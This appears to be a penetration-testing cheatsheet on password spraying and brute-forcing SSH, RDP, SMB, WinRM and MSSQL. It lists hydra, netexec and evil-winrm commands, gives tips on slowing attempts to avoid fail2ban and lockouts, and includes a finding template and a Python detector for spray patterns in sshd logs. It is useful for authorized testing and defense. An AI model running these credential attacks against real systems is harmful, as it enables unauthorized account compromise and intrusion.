πŸ›‘οΈ Methodology Checklist

  • Identify exposed authentication services: SSH, RDP, SMB, WinRM, FTP, MSSQL, MySQL
  • Check password policy to determine safe spray rate
  • Test default credentials first (admin/admin, root/root, service/service)
  • Spray with valid username list and common passwords
  • SSH spray: hydra -L users.txt -P pass.txt ssh://[TARGET]
  • SMB spray: nxc smb [TARGET] -u users.txt -p passwords.txt --continue-on-success
  • WinRM: nxc winrm [TARGET] -u users.txt -p passwords.txt
  • MSSQL: hydra -L users.txt -P pass.txt mssql://[TARGET]

🎯 Operational Context

Use when: valid credentials are needed for network service access, i.e. brute force or spray SSH, FTP, SMB, WinRM, RDP or HTTP forms.

Think Dumber First: don't brute force blindly. Spray one common password across all users before trying multiple passwords against one user. Password123! and Welcome1 catch more accounts than an exhaustive single-user brute force.

Skip when: the service has a strong lockout policy. Calculate the safe spray rate first with a --pass-pol check.


⚡ Tactical Cheatsheet

Command | Tactical Outcome
netexec winrm [TARGET_IP] -u [USER_LIST] -p [PASS_LIST] | Spray credentials against WinRM
evil-winrm -i [TARGET_IP] -u [USER] -p [PASS] | Open PowerShell session via WinRM
hydra -L [USER_LIST] -P [PASS_LIST] ssh://[TARGET_IP] | Brute-force SSH
ssh [USER]@[TARGET_IP] | Connect via SSH
hydra -L [USER_LIST] -P [PASS_LIST] rdp://[TARGET_IP] -t 4 | Brute-force RDP (low thread count to avoid crashes)
xfreerdp /v:[TARGET_IP] /u:[USER] /p:[PASS] | Connect via RDP from Linux
hydra -L [USER_LIST] -P [PASS_LIST] smb://[TARGET_IP] | Brute-force SMB (may fail on SMBv3)
netexec smb [TARGET_IP] -u [USER_LIST] -p [PASS_LIST] | Spray SMB credentials
netexec smb [TARGET_IP] -u [USER] -p [PASS] --shares | Enumerate shares with valid creds
smbclient -U [USER] \\\\[TARGET_IP]\\[SHARE] | Connect to SMB share
use auxiliary/scanner/smb/smb_login | MSF module for SMB auth (reliable on SMBv3)

🔬 Deep Dive & Workflow

WinRM (Port 5985/5986)

Microsoft's WS-Management protocol (SOAP/XML over HTTP/HTTPS). Used by Enter-PSSession, PowerShell remoting, and evil-winrm.

Successful spray output shows (Pwn3d!) next to the credential pair. This indicates the account has admin/execute rights on the host, not just that it authenticated.

netexec winrm [TARGET_IP] -u user.list -p password.list
# TARGET [TARGET_IP]:5985 WinRM - [+] domain\user:pass (Pwn3d!)

Evil-WinRM provides an interactive PowerShell session:

sudo gem install evil-winrm
evil-winrm -i [TARGET_IP] -u [USER] -p [PASS]

SSH (Port 22)

Standard Hydra dictionary attack. SSH rate-limits aggressively on most systems, so don't over-thread:

hydra -L user.list -P password.list ssh://[TARGET_IP]

RDP (Port 3389)

RDP is sensitive to connection speed. High thread counts crash the service or trigger lockouts:

  • Use -t 4 (max 4 threads) or -t 1 for fragile targets
  • Use the -W flag to add a delay (in seconds) between attempts per thread

Connect with xfreerdp (type Y to trust the certificate on first connection):

xfreerdp /v:[TARGET_IP] /u:[USER] /p:[PASS]

SMB (Port 445)

Three attack methods in priority order:

  1. NetExec: most reliable, handles SMBv3
  2. MSF smb_login: fallback when Hydra fails on SMBv3
  3. Hydra: may error with "invalid reply from target" on modern Windows

After getting valid credentials, enumerate shares before mounting:

netexec smb [TARGET_IP] -u [USER] -p [PASS] --shares
smbclient -U [USER] \\\\[TARGET_IP]\\SHARENAME

πŸ› οΈ Troubleshooting & Edge Cases

Problem | Cause | Fix
Hydra module not found for service | Wrong service name | hydra -h lists the supported service names (ssh, ftp, smb, rdp, http-get, http-post-form, ...); hydra -U http-post-form shows that module's usage
Hydra returns false positives | Success condition wrong | For form brute force, check the failure string (the F= condition in the http-post-form module string) carefully; test one login manually first
SSH brute detected and blocked | fail2ban or IDS | Reduce rate: hydra -t 2 -W 3 (2 threads, 3 s between attempts); or use Medusa with a lower thread count
WinRM brute fails | Authentication type mismatch | Use nxc: nxc winrm [TARGET] -u users.txt -p pass.txt, which handles WinRM auth correctly
HTTP form brute missing CSRF | Dynamic token required | Use Burp Intruder with a session-handling macro to capture a fresh CSRF token per request

πŸ“ Reporting Trigger

Finding Title: Network Service Credentials Compromised via Password Attack

Impact: Valid credentials obtained through password spraying or brute force provide authenticated access to target services, bypassing all technical controls that rely on authentication as the security boundary.

Root Cause: Weak or default passwords in use. No MFA implemented. Failed authentication not alerted on or rate-limited at the service level.

Recommendation: Implement MFA for all network services. Deploy centralized authentication with lockout policies. Alert on failed authentication bursts. Conduct an organization-wide forced password reset for all accounts with weak passwords.
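The recommendation above to alert on failed-authentication bursts, as an added detection example that is not part of the original page: it parses constructed sshd auth.log lines and labels each source IP as spraying (one burst spread across many users, the pattern described in the Operational Context) or brute-forcing (one burst against a single user), and flags a source that later logged in. The log format, the 60-second window and the threshold of four failures are assumptions.

```python
import re
from datetime import datetime
# Constructed sshd auth.log sample (not real data): 10.0.0.5 sprays one password across
# four users and lands on the fourth; 10.0.0.9 hammers root; 10.0.0.7 is a benign typo.
SAMPLE_LOG = """\
Mar 10 09:00:01 host sshd[100]: Failed password for invalid user alice from 10.0.0.5 port 50001 ssh2
Mar 10 09:00:02 host sshd[101]: Failed password for bob from 10.0.0.5 port 50002 ssh2
Mar 10 09:00:03 host sshd[102]: Failed password for carol from 10.0.0.5 port 50003 ssh2
Mar 10 09:00:04 host sshd[103]: Failed password for dave from 10.0.0.5 port 50004 ssh2
Mar 10 09:00:05 host sshd[104]: Accepted password for dave from 10.0.0.5 port 50005 ssh2
Mar 10 09:01:00 host sshd[200]: Failed password for root from 10.0.0.9 port 40001 ssh2
Mar 10 09:01:01 host sshd[201]: Failed password for root from 10.0.0.9 port 40002 ssh2
Mar 10 09:01:02 host sshd[202]: Failed password for root from 10.0.0.9 port 40003 ssh2
Mar 10 09:01:03 host sshd[203]: Failed password for root from 10.0.0.9 port 40004 ssh2
Mar 10 09:05:00 host sshd[300]: Failed password for frank from 10.0.0.7 port 30001 ssh2
Mar 10 09:05:30 host sshd[301]: Accepted password for frank from 10.0.0.7 port 30002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<stamp>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+")

def parse(log_text):
    """Return time-sorted (timestamp, result, user, ip) tuples for sshd password-auth lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog stamps carry no year; strptime defaults to 1900, fine for deltas
            events.append((datetime.strptime(m["stamp"], "%b %d %H:%M:%S"),
                           m["result"], m["user"], m["ip"]))
    return sorted(events)

def classify_sources(events, window_s=60, min_failures=4):
    """Per source IP: densest failure burst within window_s seconds. A burst over >= min_failures
    distinct users is a spray, the same count on one user a brute force; also flag later success."""
    by_ip = {}
    for ev in events:
        by_ip.setdefault(ev[3], []).append(ev)
    verdicts = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e[1] == "Failed"]
        burst = max((sum(1 for t, *_ in fails[i:] if (t - t0).total_seconds() <= window_s)
                     for i, (t0, *_) in enumerate(fails)), default=0)
        if burst < min_failures:
            continue
        users = {e[2] for e in fails}
        verdicts[ip] = {"pattern": "spray" if len(users) >= min_failures else "brute",
                        "failures": len(fails), "distinct_users": len(users),
                        "success_after_failures": any(e[1] == "Accepted" and e[0] > fails[0][0] for e in evs)}
    return verdicts
```

A source whose burst also yields a later Accepted line is the case worth paging on: the spray landed and the account needs a reset, not just a block.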